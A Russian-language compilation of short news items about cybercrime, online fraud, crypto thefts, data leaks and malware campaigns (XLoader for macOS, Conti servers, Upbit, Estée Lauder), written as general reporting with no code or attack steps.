Еще одного «счастливчика» подозревают в наличии сообщников. Расследование, проводившееся два года назад, пришло к выводу, что казино, возможно, было мишенью преступных группировок.
Мошенник рекламировал поддельный NFT Бэнкси на официальном сайте художника, продал невзаимозаменяемый токен на рынке OpenSea за $338 000, а затем вернул покупателю почти все деньги.
На этой неделе на официальном сайте художника Бэнкси появилась информация о продаже NFT, который затем был продан с аукциона на рынке OpenSea за 100 ETH. Однако, согласно заявлению команды художника, произведение искусства «Great Redistribution of the Climate Change Disaster», вдохновленное проектом CryptoPunk, не принадлежит Бэнкси.
«Все произошло так быстро», – сказал Pranksy, инвестор, который купил поддельный NFT.
Пользователь Yosefo связался с Pranksy вчера утром через приложение для обмена сообщениями Discord и рассказал об аукционе NFT Бэнкси. Yosefo поделился ссылкой на официальный сайт Banksy, на котором была размещена информация о работе, и ссылкой на аукцион NFT на OpenSea. Затем Pranksy сделал ставку в размере 100 ETH, после чего аукцион внезапно завершился.
«Я заподозрил неладное, когда предложение было принято так быстро», – сказал Pranksy.
Через полтора часа после окончания аукциона реклама NFT на сайте Бэнкси была удалена.
Примерно через восемь часов мошенник вернул Pranksy 97.69 ETH.
«Понятия не имею, почему он вернул деньги. Возможно он понял, что я выследил его», – сказал Pranksy.
Он отметил, что был введен в заблуждение тем, что информация о NFT появилась на официальном сайте Бэнкси. Он сказал, что команда художника, вероятно, частично ответственна за развитие ситуации.
«Я не буду предъявлять претензии», – сказал Pranksy. «Это был мой выбор».
Позднее он написал в Twitter, что не имеет отношения к появлению информации о NFT на сайте Бэнкси и никогда бы не стал «рисковать будущими возможными отношениями с художником» ради покупки NFT у самого себя.
В июне британский аукционный дом Phillips заявил, что примет оплату в ETH и BTC при продаже работы художника Бэнкси «Laugh Now Panel A», которая оценивается в сумму от $2.8 до $4.1 млн.
Прокурорами Новгород-Северской окружной прокуратуры Черниговской области направлен в суд обвинительный акт в отношении жителя Семеновской ОТГ Новгород- Северского района по факту мошенничества, совершенного путем незаконных операций с использованием электронно-вычислительной техники в особо крупных размерах (ч. 3, 4, 5 ст. 190 УК Украины).
Досудебным расследованием установлено, что 25-летний мужчина придумал мошенническую схему завладения денежными средствами граждан под видом срочных сборов на нужды якобы военного, который служит в ВСУ.
Пользуясь возможностями социальных сетей, он выдавал себя за военнослужащего и под разными вымышленными предлогами (необходимость приобретения снаряжения, лекарств, авто и т.д.) систематически обращался к жительнице Киевской области, которая недавно получила денежную помощь в связи с гибелью сына-защитника Украины, с просьбой предоставить финансовую помощь. Будучи введенной в заблуждение, потерпевшая перечислила на карточные счета злоумышленника почти 1,5 млн грн.
Другим потерпевшим аналогичными преступными действиями нанесен ущерб на сумму почти 70 тыс. грн. Полученные деньги мужчина в дальнейшем использовал для собственных нужд.
Кроме того, обвиняемый создал дополнительную фиктивную страницу в сети «Facebook», с которой от имени вымышленной девушки добавлял в друзья военнослужащих, переписывался с ними и предлагал перечислить на его личный банковский счет денежные средства вроде бы на крайне необходимое лечение тяжелобольного сына.
Установлено 11 потерпевших, которые перевели на банковскую карточку обвиняемого от 500 до 6000 грн.
Сейчас мужчина содержится под стражей.
Досудебное расследование осуществлялось следователями Новгород-Северского РОП ГУНП в Черниговской области при оперативном сопровождении Управления СБУ в Черниговской области.
Молодой человек загладил вину перед потерпевшими, и те не стали требовать от суда жесткого наказания.
Ленинский районный суд приговорил Алексея Мурзина — хакера, заражавшего компьютерные клубы, чтобы майнить, к трем годам ограничения свободы. Это означает, что ему придется соблюдать комендантский час, регулярно отмечаться в полиции и запрещено посещать массовые мероприятия.
Согласно материалам уголовного дела, Алексей Мурзин с сообщником написали программу, позволявшую им обходить установленные в компьютерных клубах блокировки. Благодаря этому они получали доступ к жестким дискам компьютеров. Под видом клиентов они арендовали компьютеры, взламывали их защиту и устанавливали майнинг-программу T-Rex. В итоге аппаратура клубов начинала майнить криптовалюту, зачисляя ее на кошельки хакеров.
По словам собеседника 66.RU, знакомого с подробностями расследования, на счетах хакеров полиция нашла около двух десятков миллионов рублей. Мурзин объяснил происхождение денег доходами с торговли криптовалютой на биржах.
• Source: https://66.ru/news/incident/271506/
Крупная сумма криптовалюты отправилась в миксеры тысячами отдельных транзакций с кошельков, которые связаны с владельцами маркета Abraxas, совершившего экзит-скам в ноябре 2015 года. Oдин из известнейших исследователей-энтузиастов с ником ZachXBT, выложивший схему лишь одной из множества транзакций, всего речь идет о сумме в 4800 BTC.
В момент скама, при курсе в 386 долларов за один биткойн, она равнялась 1,85 миллиона долларов. На момент написания материала речь идет уже о 166,4 миллиона долларов. Таким образом, восьмилетняя пауза позволила администрации ресурса преумножить свое состояние в 90 раз.
Abraxas открылся примерно в тот же период, что и другие печально известные площадки середины прошлого десятилетия — Alphabay и Agora, то есть примерно в конце 2014 года. Сайт стал недоступен 5 ноября 2015 года, а биткойн-кошельки участников проекта были опустошены спустя несколько месяцев — в марте 2016-го.
Примерно в тоже время закрылся и проект Agora. Аналитики признают, что эти два события сыграли важную роль в развитии западного даркнет-сообщества, прямо повлияв на рост популярности и укрепление Alphabay.
source: twitter.com/zachxbt/status/1716447624318881935
В сетевых дебрях замечена новая версия XLoader под Маки.
Инфостилер и кейлогер получил обновку, написан на C и Objective C и идёт в
виде подписанного вредоносного образа вместо прежнего .jar-формата.
На VirusTotal в июле несколько загрузок малвари, так что кампания по
распространению идёт активно.
Новый XLoader замаскирован под приложение для офисной продуктивности
OfficeNote.
При запуске он выдаёт ошибку, но подтягивает вредонос.
Который, в свою очередь, ставит Launch Agent для закрепления в системе и тянет
инфу из буфера и с браузеров Chrome и Firefox.
Ну а маскировка под офисное приложение намекает на цели кампании.
Что занятно, версия XLoader под Макось заметно дороже той, что идёт под Винду:
199 баксов против 59.
Видимо, под Маки не только стильные подставочки под монитор, но и малварь
должна идти с завышенным ценником.
Edit: T.Hunter Source: thehackernews.com/2023/08/new-variant-of-xloader- macos-malware.html Report: sentinelone.com/blog/xloaders-latest-trick-new- macos-variant-disguised-as-signed-officenote-app
Сотрудники уголовного розыска ГУ МВД России по Нижегородской области задержали подозреваемого в мошенничестве под предлогом сбора денег на реставрацию православного храма Успения Пресвятой Богородицы в селе Фёдоровское Конаковского района Тверской области.
«Оперативники выяснили, что злоумышленник вёл фишинговый канал в одном из мессенджеров, где предлагал гражданам внести пожертвования.
Чтобы внушить аудитории доверие, аферист позиционировал свой канал как официальный медиаресурс прихода. Однако реквизиты для получения пожертвований он указал свои, а поступившие деньги на общественные нужды не переводил», – рассказала официальный представитель МВД России Ирина Волк.
Следователем СУ УМВД России по г. Нижнему Новгороду возбуждено уголовное дело по признакам преступления, предусмотренного частью второй статьи 159 УК РФ.
«В ходе обыска в жилище фигуранта изъяты компьютерная техника, рабочие записи, банковские и сим-карты, а также другие предметы, имеющие доказательственное значение. В сейфе обнаружены 600 000 рублей, а также более 31 000 евро и 78 000 долларов США.
Мужчине избрана мера пресечения в виде запрета определённых действий. Предварительное расследование продолжается», – сообщила Ирина Волк.
Настоятель храма Успения Пресвятой Богородицы иерей Антоний поблагодарил оперативников за эффективную работу, отметив: «Полицейские быстро и оперативно установили злоумышленника. Приношу великую благодарность сотрудникам УМВД России по Нижегородской области за их профессионализм».
Сотрудники полиции собрали неопровержимые доказательства совершения участниками преступной группы 45 фактов присвоения официальных документов граждан со всей территории Украины и незаконного использования их для совершения почти 250 мошенничеств в отношении юридических лиц, осуществляющих финансовую деятельность. За содеянное фигурантам грозит до 8 лет заключения.
В прошлом году оперативники областного управления уголовного розыска совместно с коллегами из Следственного управления ГУНП в Черновицкой области под процессуальным руководством Черновицкой областной прокуратуры обезвредили функционирование мошеннической ОПГ.
Во время проведения следствия полицейские выяснили, что 29-летний житель столицы вместе с двумя сообщницами, в возрасте 21 и 29 лет, наладили схему незаконного обогащения. Злоумышленники в одной социальной сети размещали объявления об удаленной работе - "Люди не платите средства за ссылки, сайты! Есть возможность зарабатывать ежедневно, нужны карточки. Честно! Законно! Пишите в пп ". Во время переписки мошенники рассказывали потенциальным жертвам условия заработка и входили в доверие для получения конфиденциальной информации. Чтобы завладеть благосклонностью и доверием, «работодатели» за каждое пользование карточным счетом платили гражданам по 500 гривен.
В дальнейшем аферисты получили копии документов, а именно паспорт, индивидуальный код налогоплательщика и другие персональные данные жертв, а также склоняли к введению комбинаций на мобильном телефоне, которые блокировали номер телефона. Проведя эти манипуляции, мошенники получали доступ к онлайн-банкингу потерпевших и оформляли кредиты на их имя.
Сотрудники полиции Черновицкой области установили, что члены ОПГ совершили почти 250 мошенничеств и 45 фактов незаконного присвоения и использования официальных документов. Таким образом аферистам удалось завладеть почти 2 миллионами гривен.
Сейчас следователи полиции завершили досудебное расследование, материалы, которого с обвинительным актом направили в суд для рассмотрения. Злоумышленникам инкриминируют совершение уголовных правонарушений, предусмотренных:
- ч. 3 ст. 28, ч. 3 ст. 357 (Похищение, присвоение, вымогательство документов, штампов, печатей, завладение ими путем мошенничества или злоупотребления служебным положением или их повреждение);
- ч. 3 ст. 28, ч. 1, 2 ст. 182 (Нарушение неприкосновенности частной жизни);
- ч. 2, 3 ст. 27 (Виды соучастников), ч. 4 ст. 190 (в редакции до 11.08.2023) (Мошенничество);
- ч. 1 ст. 209 (Легализация (отмывание) имущества, полученного преступным путем) Уголовного кодекса Украины.Click to expand...
cv.npu.gov.ua/news/na-bukovyni-sudytymut-chleniv-orhanizovanoi-zlochynnoi- hrupy-shakhraiv-iaki-pid-pryvodom-nadannia-onlain-roboty-oformlialy-kredyty- na-dovirlyvykh-hromadian
Под процессуальным руководством Киевской областной и Броварской окружной прокуратур разоблачены и сообщено о подозрении четырем участникам организованной группы по факту мошенничества (ч. 4 ст. 190 УК Украины).
По данным следствия, в конце 2022 года подозреваемые создали вебсайты на которых размещали фейковые объявления о продаже генераторов. В этот период они пользовались спросом из-за продолжающихся блэкаутов.
В общении с потенциальными покупателями из разных уголков Украины они убеждали их перечислять полную подписку на подконтрольные банковские счета. Получив деньги, больше на связь не выходили. Таким образом подозреваемые присвоили почти миллион гривен.
Полученные от преступной деятельности средства организатор распределял между всеми участниками группы.
Следствие проверяет причастность подозреваемых к мошенническим действиям в отношении 20 человек.
Досудебное расследование осуществляется следователями Броварского райуправления ГУ Нацполиции в Киевской области при оперативном сопровождении Управления противодействия киберпреступлениям в Киевской области ДКП НП Украины.
Французский суд освободил двух братьев, ответственных за кражу $8,5 млн. с платформы децентрализованных финансов (DeFi) Platypus, без каких-либо последствий.
16 февраля хакеры смогли вывести и переместить $8,5 млн с Platypus, используя атаку с использованием флэш-кредита, что вынудило протокол приостановить торговые услуги до нахождения решения. Атака флэш-кредита (мгновенного кредита, Flash Loans) — вид мошенничества, подразумевающий получение быстрого кредита без залога, который искусственно поднимает цену цифровой монеты, а затем сброс криптовалюты с прибылью.
С помощью команды безопасности Binance и независимых исследователей криптовалюты удалось отследить украденные средства, что привело к хакерам: Мохаммеду и его брату Бенамару М. Братья находились под стражей с 24 февраля, и на судебном заседании 26 октября признались в краже и отмывании средств, но заявили, что являются белыми хакерами и действовали с хорошими намерениями. Киберпреступники утверждали, что их целью было использовать пробелы в системе и позже вернуть активы в обмен на 10% от украденного.
Учитывая сходство с попыткой получения вознаграждения за обнаружение уязвимостей, суд полностью оправдал братьев от всех уголовных обвинений. Во время атаки €7,8 млн. в токенах стали недоступными после того, как оказались застрявшими в кошельке.
По результатам расследования фирмы по безопасности блокчейна CertiK, атака 12 октября была проведена в 3 этапа, при каждом из которых было украдено соответственно $2,23 млн., $575 тыс. и $450 тыс. в различных криптовалютах. 17 октября Platypus смогла восстановить 90% украденного после соглашения с хакером.
Такой случай подчёркивает врождённые риски в системе DeFi, где автоматизация и смарт-контракты могут быть подвержены эксплуатации. Оправдание в этом случае вызывает вопросы о границах этичного хакинга и его роли в стремительно развивающемся мире криптовалют.
Около $9 млн. в стейблкоине Tether были изъяты у мошенников, которые похищали средства жертв через романтические (romance scam) и криптовалютные аферы. По данным Министерства юстиции США, изъятые средства были прослежены до криптовалютных адресов, предположительно связанных с организованной сетью мошенников, от которой пострадали более 70 жертв по всей Америке в рамках схемы Pig Butchering («разделка свиньи»).
Согласно судебным документам, преступники координировали действия, чтобы завоевать доверие жертв и обманом заставить их вносить депозиты в криптовалюте. Мошенники создавали поддельные веб-сайты, имитирующие фирмы и криптовалютные биржи с высокой репутацией.
Агенты Секретной службы США (US Secret Service, USSS) смогли проследить за депозитами жертв, которые быстро отмывались. Мошенники использовали технику, называемую «chain hopping», когда депонированные средства отмываются путем перевода через десятки криптовалютных адресов и обмена на несколько различных криптовалют.
Изъятие средств ($9 млн. в криптовалюте Tether) нарушило финансовую инфраструктуру сети. Средства на данный момент находятся под контролем правоохранительных органов США в Северном округе Калифорнии. По данным прокуратуры США, компания Tether Limited Inc. помогла конфисковать криптовалюту у мошенников.
source: justice[.]gov/opa/pr/cyber-scam-organization-disrupted-through- seizure-nearly-9m-crypto
Атакующий будет атаковать каждый новый сервер группы.
Неизвестный злоумышленник провел DDoS-атаку на серверы Cobalt Strike, которыми управляют бывшие члены Conti, сопровождающуюся антироссийскими сообщениями, чтобы помешать их деятельности.
После отключения своей внутренней инфраструктуры в мае участники Conti присоединились к другим группировкам – Quantum, Hive и BlackCat. Однако, бывшие члены Conti продолжают использовать ту же инфраструктуру Cobalt Strike для проведения новых атак в рамках других кампаний с программами-вымогателями.
Киберпреступник использует C&C-сервер TeamServer для управления полезными нагрузками Cobalt Strike Beacon на скомпрометированных хостах, что позволяет осуществлять боковое перемещение. При атаке серверов Cobalt Strike киберпреступник изменил имена компьютеров на различные антироссийские сообщения .
Генеральный директор компании AdvIntel Виталий Кремез заявил, что атакующий изначально был нацелен как минимум на 4 сервера Cobalt Strike, которые предположительно контролируются бывшими членами Conti. Кремез сказал, что сообщения заполняют серверы со скоростью 2 сообщения в секунду.
В результате такого большого количества эхо-запросов Java-приложение TeamServer перегружается, и его деятельность прерывается аналогично состоянию отказа в обслуживании (DoS).
По словам Кремеза , хакер постоянно нацелен на эти серверы Conti, возобновляя атаки каждый раз, когда обнаруживается новый сервер.
source:
twitter.com/BleepinComputer/status/1567524188650455043
twitter.com/VK_Intel
Лицензию на российское ПО FindFace в том числе получили Intel, SpaceX и Интерпол
Десятки американских компаний получили лицензию на использование технологии распознавания лиц FindFace, которая была разработана российской компанией NTechLab.
Информацию предоставил анонимный источник, передавший изданию базу данных клиентов NTech Lab. В список возможных пользователей FindFace входит более 1100 наименований компаний и правительственных организаций из более чем 60 государств, в том числе десятки компаний США.
В их числе компании Intel, SpaceX, Dell, Philip Morris, Nokia, Honeywell, Bosch, правоохранительные и военные ведомства, Интерпол, королевская армия Таиланда, федеральная полиция Бразилии, ФСБ, ФСИН, российские школы и множество других организаций по всему миру. По данным портала, ПО использовали по меньшей мере 20 украинских учреждений. Среди покупателей FindFace оказались и частные лица, миллиардеры и олигархи.
По словам представителя американской Philip Morris, компания рассматривала
возможность использования FindFace, но приобрела технологию у другой фирмы.
Некоторые признаются, что пользовались этим ПО несколько лет назад. Intel, в
свою очередь, отрицает опыт использования российской программы. Сотрудник
NTechLab, при этом, рассказал, что список содержит «несколько текущих
клиентов», а также тех, кто пользовался ПО ранее.
NTechLab заявил Business Insider, что, несмотря на утечку данных, клиентам
ничто не угрожает, их биометрические данные в безопасности, а работа
программного обеспечения «не демонстрирует признаков хакерской атаки».
Компания расследует утечку, и, если она подтвердится, руководство проведет
проверку безопасности и примет необходимые меры.
source: businessinsider.com/intel-spacex-philip-morris-leaked-database-users- ntech-russian-facial-recognition-company-2022-7
СМИ сообщили, что в даркнете закрылась торговая площадка ToRReZ. Операторы маркетплейса прекратили работу сайта добровольно, то есть ToRReZ стал уже третьей торговой площадкой, закрытой «по собственному желанию» в этом году.
В частности, о закрытии ToRReZ [пишет](https://therecord.media/dark-web- marketplace-torrez-shuts-down) издание The Record. Журналисты говорят, что сайт был запущен в феврале 2020 года и работал по той же схеме, что Amazon и eBay (с поправкой на нелегальность), позволяя пользователям регистрироваться на сайте в качестве покупателей или продавцов.
На ToRReZ, согласно его собственной статистике, было зарегистрировано более 160 000 пользователей, и сайт был известен прежде всего продажей наркотиков, хотя также предлагал другие «продукты», включая малварь, дампы данных, фальшивые документы и так далее.
«После 675 дней присутствия в даркнете мы решили закрыть нашу дверь навсегда», — написал на главной странице сайта администратор ToRReZ, известный под ником MrBlonde.
Это сообщение было опубликовано еще 17 декабря, и администраторы ресурса уже отключили регистрацию новых учетных записей и публикацию новых объявлений. Серверы ToRReZ планируется остановить через 2-3 недели, а пока пользователям дали время на вывод средств, завершение транзакций, а также урегулирование любых жалоб и споров.
При этом операторы ToRReZ заявляют, что они закрываются по собственному решению и в будущем могут запустить новый маркетплейс.
Ранее в этом году так же добровольно закрылась дургая крупная торговая площадка, White House Market, а также менее популярный сайт Cannazon (хотя в этом случае администраторы жаловались на постоянные DDoS-атаки).
Закрытый ключ шифрования будет храниться в аппаратном ключе, а открытый – на компьютере пользователя.
Отныне пользователи GitHub могут защищать свои учетные записи с помощью аппаратных ключей безопасности FIDO2.
Два года назад исследователи Университет штата Северная Каролина просканировали порядка 13% от всех GitHub-репозиториев и обнаружили, что более 10 тыс. из них имеют утекшие токены API и криптографические ключи (SSH и TLS). Более того, утечку API и ключей ежедневно допускают тысячи новых репозиториев.
Теперь же пользователи могут с помощью миниатюрных устройств FIDO2 обеспечивать дополнительную защиту своих Git-операций, предотвращая случайные утечки и блокируя вредоносному ПО доступ к учетным записям.
«Сгенерированные новые ключи можно добавлять в учетную запись как любой другой SSH-ключ. Вы по-прежнему создаете пару из закрытого и открытого ключа, но секретные биты будут храниться в ключе безопасности, а открытые – на вашей машине, как и любой другой SSH-ключ», - пояснил старший инженер по безопасности GitHub Кевин Джонс (Kevin Jones).
Хотя закрытый ключ и будет храниться на компьютере, он будет представлять собой всего лишь ссылку на физический ключ безопасности, бесполезную без доступа к фактическому устройству.
«При использовании SSH с ключом безопасности никакая конфиденциальная информация никогда не покидает физический ключ безопасности. Если вы являетесь единственным человеком, имеющим физический доступ к вашему электронному ключу, можете без опасений оставлять его подключенным», - сообщил Джонс.
Для того чтобы еще больше повысить безопасность учетной записи GitHub, рекомендуется поменять все ранее зарегистрированные SSH-ключи на SSH-ключи, поддерживаемые ключами безопасности.
Компания AMD советует владельцам процессоров на архитектуре Zen 3 отключить функцию Predictive Store Forwarding (PSF), повышающую производительность, если те собираются использовать машину для конфиденциальных операций. Дело в том, что эта функция уязвима для side-channel атак, подобных Spectre.
Данная функция связана с упреждающим (или спекулятивным — speculative) механизмом исполнения команд, то есть ЦП заранее выполняет несколько альтернативных операций для ускорения работы, а затем отбрасывает ненужные «предсказанные» данные.
Издание The Record цитирует специалиста Грацского технического университета Дэниэля Грусса (Daniel Gruss), который обнаружил, что AMD PSF может быть уязвима перед различными side-channel атаками, которых за прошедшие годы разработали немало, достаточно вспомнить Spectre, Meltdown, Spectre-NG, ZombieLoad, Foreshadow, RIDL, Fallout, LVI и так далее.
«В целом PSF представляет собой расширение более простых форм store-to-load, что ранее уже использовали для Spectre-атак. Таким образом, PSF позволяет эксплуатировать новые варианты атак Spectre-STL (или Spectre-v4). PSF добавляет злоумышленнику еще одну возможность напрямую получить значения из домена жертвы, если в домене жертвы работают очень специфические гаджеты», — объяснил Грусс.
Click to expand...
Представители AMD уже признали, что исследователи могут быть правы, и функция PSF может подвергать клиентов различным рискам. В итоге компания рекомендует пользователям использовать аппаратную, а не софтверную песочницу или отключать PSF вовсе.
Источник: xakep.ru/2021/04/05/zen-3-psf/
️
Facebook шпионила за трафиком пользователей в Snapchat, Amazon, YouTube
Пишут, что в 2016 году Facebook* запустила секретный проект
по
перехвату и расшифровке сетевого трафика пользователей в Snapchat. Корпорация
Цукерберга хотела понять поведение пользователей в мобильном приложении
конкурента. В судебных документах указывается секретное название проекта
"Охотники
за привидениями". Прям как в одноимённом фильме.
Деятельность Meta* в этом направлении коснулась не только
Snapchat...корпорация пыталась анализировать трафик пользователей при
взаимодействии с приложениями Amazon и YouTube. Учитывая, что эти приложения
используют шифрование, Facebook пришлось разработать
"специальную
технологию для обхода".
"Этот проект был частью программы In-App Action Panel (IAPP), которая использовала технологию "перехвата и расшифровки" трафика пользователей в Snapchat, а затем и YouTube и Amazon", - пишут адвокаты в документе.
Цукерберг в 2016 поручил специалистам Meta* "раздобыть надёжную аналитику в отношении конкурентов, минуя шифрование". Так родился проект "Охотники за привидениями", в рамках которого появился Onavo VPN для перехвата трафика пользователей.
Meta приобрела Onavo у
израильской
фирмы более 10 лет назад, обещая пользователям приватный доступ к сети. Однако
на деле сервис использовался для шпионажа за конкурирующими приложениями с
помощью MITM десятков миллионов людей, которые скачали Onavo.
Серия скандалов с Meta* [
1 - https://t.me/Russian_OSINT/1634
2 - https://t.me/Russian_OSINT/2870
3 - https://t.me/Russian_OSINT/3616
4 - https://t.me/Russian_OSINT/3742
продолжает собирать обороты.
*Деятельность Meta (соцсети Facebook, Instagram, Threads) запрещена в России как экстремистская.
Источник новостей: <https://techcrunch.com/2024/03/26/facebook-secret-project- snooped-snapchat-user-traffic/>
53-летний инженер из индийского города Бангалор стал жертвой мошенничества — он потерял 95 лакхов рупий ($114 230), инвестировав в криптовалютную схему.
Мужчина рассказал, что два года назад он познакомился в Instagram с некой Соней Шеной (Sonia Shenoy), представляющей международную инвестиционную компанию, которая занимается торговлей биткоинами. В
январе прошлого года она убедила мужчину инвестировать через нее в биткоин более $114 000. Ситуация стала еще более запутанной в июле прошлого года, когда Шеной сообщила жертве, будто он заработал 2 крор рупий ($240 000).
Однако для вывода денег требовалось внести еще 50 лакхов (около $60 000) в качестве налога, удерживаемого у источника (TDS). Все еще питая доверие к своей знакомой, инженер взял кредиты в различных банках, чтобы внести запрашиваемую сумму для вывода «прибыли». Мужчина прождал обещанную прибыль несколько месяцев, после чего осознал, что его обманули.
Уголовное дело возбуждено в Астраханской области в отношении системного администратора медучреждения, передававшего сведения об усопших третьим лицам, сообщает пресс-центр МВД РФ.
По версии следствия, подозреваемый, являясь системным администратором отдела технического и программного обеспечения медучреждения, подключился к ведомственной информационно-аналитической системе с помощью VPN-сервиса и завладел персональными данными пациентов медицинских организаций Астраханской области.
«Имея доступ к массиву данных на протяжении нескольких лет, он завладевал сведениями об усопших и, используя программу для удаленного доступа к сервису, предавал сведения об умерших третьим лицам за ежемесячное денежное вознаграждение», – говорится в сообщении пресс-центра.
По предварительным данным, информация передавалась предпринимателям в области ритуальных услуг. Незаконная деятельность сисадмина была пресечена оперативниками Отдела по борьбе с противоправным использованием информационно- коммуникационных технологий УМВД России по Астраханской области совместно с коллегами из регионального УФСБ.
Возбуждено уголовное дело по части 4 статьи 274.1 УК РФ (неправомерное воздействие на критическую информационную инфраструктуру РФ).
UpBit пострадал от мошенничества с поддельными токенами Aptos (APT) на сумму 3,4 миллиарда долларов
Крупнейшая криптовалютная биржа Южной Кореи Upbit борется с серьезным нарушением безопасности, которое вызвало шок в криптовалютном сообществе. Это произошло после того, как ранее в воскресенье биржа обнаружила, что на ее платформу был внесен мошеннический депозит, при этом мошенники успешно выдали поддельную монету за законный токен Aptos (APT).
Шокирующее нарушение было обнаружено, когда система Upbit ошибочно идентифицировала фальшивую монету как APT, что позволило боту разместить значительное количество поддельных токенов на многочисленных учетных записях пользователей, сообщает корейское СМИ Web 3 [Builders](https://web3builders.info/south-koreas-largest-exchange-upbit- suffers-a-fraudulent-deposit/) .
Масштаб взлома был ошеломляющим: он затронул около 100 000 счетов, на всех из которых находились депозиты APT . Примечательно, что общая стоимость поддельных токенов APT составила ошеломляющие 3,4 миллиарда долларов, что делает это одним из крупнейших нарушений безопасности криптовалюты за последнее время. Также поступали сообщения о том, что многочисленные корейские пользователи заявили, что получили токены APT, не инициируя транзакции самостоятельно.
В ответ на взлом Upbit принял незамедлительные меры для защиты своих пользователей, приостановив ввод и вывод средств APT, сославшись на необходимость обслуживания системы кошелька.
«В связи с техническим обслуживанием системы кошельков Aptos (APT) мы приостанавливаем услугу пополнения и вывода средств Aptos (APT). Мы возобновим ввод и вывод средств после завершения технического обслуживания и сообщим о возобновлении обслуживания посредством этого уведомления», — написала биржа в заявлении для пользователей.
Click to expand...
В социальных сетях южнокорейский специалист по криптографии и соучредитель TUNABOT «Mingmingbbs» помог раскрыть важные детали взлома. Расследование эксперта показало, что поддельные токены APT были даже не собственной монетой Aptos Network, а скорее мошенническим токеном под названием «ClaimAPTGift».
По словам Мингминббса, проблема возникла из-за того, что система Upbit не проверяла должным образом тип передаваемых монет, ошибочно рассматривая все монеты как один и тот же токен APT. Обычно он должен был проверять определенные условия, например, соответствуют ли монеты определенному типу. К счастью, катастрофы удалось избежать, поскольку токен мошенника имел другую десятичную систему (6), чем реальная (8). Это помешало пользователям получить 25 000 долларов вместо 250 долларов, что могло вызвать «значительный сбой».
Тем не менее, несмотря на инцидент, инвесторы остались равнодушны, накачивая APT и отвергая эту новость как типичную FUD. На момент публикации цена Aptos торгуется на уровне $5,42 после роста чуть более чем на 5% за последние 24 часа.
Хакерские группировки BlackCat (ALPHV) и Clop заявили о взломе Estée Lauder, американского гиганта бьюти-индустрии. Участники BlackCat и вовсе высмеяли меры безопасности компании и сообщают, что долго сохраняли доступ к ее сети.
Ранее на этой неделе представители Estée Lauder подали заявление в Комиссию по ценным бумагам и биржам США, сообщив о хакерской атаке. Согласно этим документам, злоумышленники получили доступ к некоторым из систем компании и, возможно, похитили данные.
В Estée Lauder сообщают, что в настоящее время восстанавливают затронутые атакой службы и системы, и «инцидент вызвал и продолжает вызывать сбои в бизнес-операциях компании».
Пока компания не раскрыла подробности случившегося, но сообщила, что действовала на опережение и отключила некоторые системы, чтобы предотвратить продвижение атакующих по сети. Сейчас расследованием произошедшего занимаются сторонние ИБ-эксперты и правоохранительные органы.
Как теперь сообщили СМИ, ответственность за взлом компании взяли на себя сразу две хак-группы.
Вначале заявление о взломе Estée Lauder появилось на сайте Clop. Похоже, вымогатели получили доступ к сети компании через уязвимость в MOVEit Transfer, от которой ранее пострадали сотни других компаний и организаций. Представители группировки пишут, что во время атаки им удалось похитить 131 ГБ данных.
Также об успешной атаке на Estée Lauder сообщили и представители группировки BlackCat. В своем посте они выражают недовольство тем, кто представители компании до сих пор не ответили им на вымогательские письма, которые хакеры посылали начиная с 15 июля 2023 года.
Кроме того, BlackCat заявляет, что хотя к реагированию на инцидент привлекли экспертов Microsoft Detection and Response Team(DART) и компании Mandiant, сеть Estée Lauder еще долго оставалась скомпрометированной, а они сохраняли к ней доступ.
Злоумышленники говорят, что не шифровали системы компании, но угрожают опубликовать похищенные данные, если Estée Lauder не выйдет с ними на связь. Хакеры намекают, что украденная информация может затрагивать клиентов, сотрудников и поставщиков компании.
Злоумышленники начали интересоваться покупкой баз данных российского госсектора и крупных отечественных компаний.
Злоумышленники начали интересоваться покупкой баз данных, содержащих зашифрованные коды (хеш) паролей для идентификации на российских сайтах и сервисах
Целью сбора cведений стало выявление логинов и паролей, принадлежащих госслужащим и сотрудникам крупных компаний для последующего использования их при взломах критической информационной инфраструктуры (ТЭК, финансовые организации, операторы связи и др.), к такому выводу пришли эксперты DLBI.
Представители сервиса также отметили, что спрос на подобный сегмент данных фиксируется впервые, и рост можно оценивать только с нулевой базы
Как пояснил основатель DLBI Ашот Оганесян, наличие актуальных паролей пользователей государственных информационных систем позволяет злоумышленникам успешно совершить атаку с повторным использованием (password reuse), когда полученная пара логин—пароль используется при доступе к другим аккаунтам жертвы — от почты до корпоративных онлайн-сервисов, например, к рабочему месту.
Кроме того, в DLBI полагают, что рост интереса к этим данным говорит о подготовке масштабной атаки на госсектор в ближайшее время.
source: kommersant.ru/doc/5535155
Профессор Университета скрыл от США информацию о своих патентах и наградах в Китае
Бывший профессор Центра электроники высокой плотности Университета Арканзаса (University of Arkansas’ High Density Electronics Center) был заключен в тюрьму на 1 год за то, что не раскрыл китайские патенты на свои изобретения.
Профессору Саймону Со-Теонгу Ангу в 2020 году было предъявлено обвинение в мошенничестве с использованием электронных средств связи и подделки паспортов. Минюст США обвинил профессора в сокрытии «связи с компаниями и учреждениями в Китае» от Университета Арканзаса и правительственных учреждений США, для которых Центр электроники проводил исследования по договору.
Помощник генерального прокурора по национальной безопасности Джон С. Демерс назвал действия Анга «признаком нацеленности Китая на исследования и академическое сотрудничество в США с целью незаконного получения американских технологий». В заявлении Министерства юстиции говорится, что действия Энга негативно повлияли на НАСА и ВВС США.
На самом деле, Анг имеет 24 патента на своё имя в Китае. По заявлению Министерства юстиции США , Анг также не сообщил о своих многочисленных наградах за талант от Коммунистической партии Китая. В четверг Окружной суд США в Фейетвилле приговорил Анга к 1 году и 1 дню за скрытие информации о патентах в Китае.
Как сотрудник университета Анг был обязан раскрыть патенты на изобретения Университету Арканзаса, чтобы именно Университет, а не китайские организации, мог пользоваться правами интеллектуальной собственности на инновации профессора.
source: justice[.]gov/usao-wdar/pr/university-arkansas-professor-indicted-wire-fraud-and-passport-fraud | justice[.]gov/opa/pr/university-arkansas-professor-pleads-guilty-lying-federal-agents-about-patents-china
Всего череповчанин заблокировал больше тысячи компьютеров, сообщает пресс- служба ФСБ.
21-летний житель Череповецкого района решил нажиться на интернет- пользователях. На протяжении нескольких месяцев юноша устанавливал на чужие компьютеры вредоносные программы дистанционным способом. Они блокировали работу технических средств, а на экранах пользователей выползало сообщение с условиями возобновления работы.
«Программа выводила на экран пользователя предварительно заготовленное текстовое сообщение с предложением разблокировать компьютер за денежное вознаграждение в виде перевода на криптокошелек злоумышленника», — сообщает пресс-служба УФСБ РФ по Вологодской области. Подобным занятием юноша занимался с августа по октябрь 2020 года. Всего череповчанин заблокировал больше тысячи компьютеров, сообщает пресс-служба ФСБ.
